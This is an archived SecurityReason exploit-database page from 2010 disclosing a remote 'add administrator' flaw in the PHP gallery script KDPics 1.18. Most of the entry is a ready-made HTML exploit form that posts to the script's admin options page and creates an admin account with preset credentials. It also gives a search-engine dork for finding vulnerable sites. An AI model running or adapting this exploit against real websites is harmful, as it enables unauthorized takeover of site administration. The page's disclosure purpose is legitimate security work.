SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow World Laboratory of Bugtraq Database

Arrow  Topic :

Genere par KDPics 1.18 remote add administrator


Arrow  WLB : WLB-2010020092  (About)
Arrow  SecurityAlert : None
Arrow  Date : 2010-02-17
Arrow  Credit          : Snakespc
Arrow  SecurityRisk : High  Security Risk High  (About)
Arrow  Remote : Yes
Arrow  Local     : No
Arrow  Status   : Bug

Arrow  History : [2010-02-17] Started

Arrow  Affected software :  Genere par KDPics 1.18



Arrow  Text :  

=========
[»] Généré par KDPics v1.18 Remote Add Admin
=========

[»] Script: [Généré par KDPics v1.18]
[»] Language: [ PHP ]
[»] Founder: [ Snakespc Email:super_cristal@hotmail.com -
Site:sec-war.com/cc> ]
[»] Greetz to:[ sec-warTeaM, PrEdAtOr ,alnjm33 >>> All My
Mamber >> sec-war.com/cc ]
[»] Dork: "Généré par KDPics v1.18"
##############
===[ Exploit ]===

<html>
<title>Généré par KDPics v1.18 Remote Add Admin</title>

<body link="#00FF00" text="#008000"
bgcolor="#000000">

<form method="POST"
action="http://www.site.com/kdpics/admin/index.php3?page=options&c
ategorie=">
<input type="hidden" name="type"
value="add">
<table border="1" cellpadding="4"
style="border-collapse: collapse" width="100%"
bordercolor="#808080">
<tr>
<td class="top">
<p align="center"><b>User & Pass
:Snakespc</b></p>
<p align="center"><b><font face="Comic Sans
MS">
<a href="http://server/path//index.php?act=idx"
style="text-decoration: none">
<font color="#00FF00">[&#187;]Founder:[ Snakespc
Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ]</p>
[&#187;] Greetz to:[ sec-warTeaM, PrEdAtOr ,alnjm33 >>> All My
Mamber >> sec-war.com/cc ]</p>[&#187;] Dork:"Généré
par KDPics
v1.18"</font></a></font></b></p>
<p align="center"><b>Username:</b></td>
</tr>
<tr>
<td height="1">
<p align="center"><input type="text"
name="adminuser" size="30"
value="Snakespc"></td>
</tr>
<tr>
<td class="top">
<p align="center"><b>Password:</b></td>
</tr>
<tr>

<td height="22">
<p align="center">
<input type="password" name="adminpass"
size="30" value="Snakespc"></td>
</tr>
<tr>
<td align="right">
<p align="center">
<input type="submit" value="Add User >>"
style="font-weight: 700"></td>
</tr>
</form>
</table>
</html>
[&#187;]Author: Snakespc <-
#############


Audyt bezpieczeñstwa

Security Audit

Analiza pow³amaniowa

Arrow  References :  

None

If you want change this note, please use UCP



Alert

libc/fnmatch(3) DoS

Security Risk Medium- 2011-05-13

Allow attacker to denial of service apache 2.2.17 server

Apache RSS Apache Alert

» Apache HTTP Server Denial
   of Service Vulnerability

» Multiple Vendors
   libc/fnmatch(3) DoS (incl
   apache poc)

» Apache Continuum
   cross-site scripting
   vulnerability

» Apache Tomcat DoS
   Vulnerability

Copyright © SecurityReason.com. All Rights Reserved.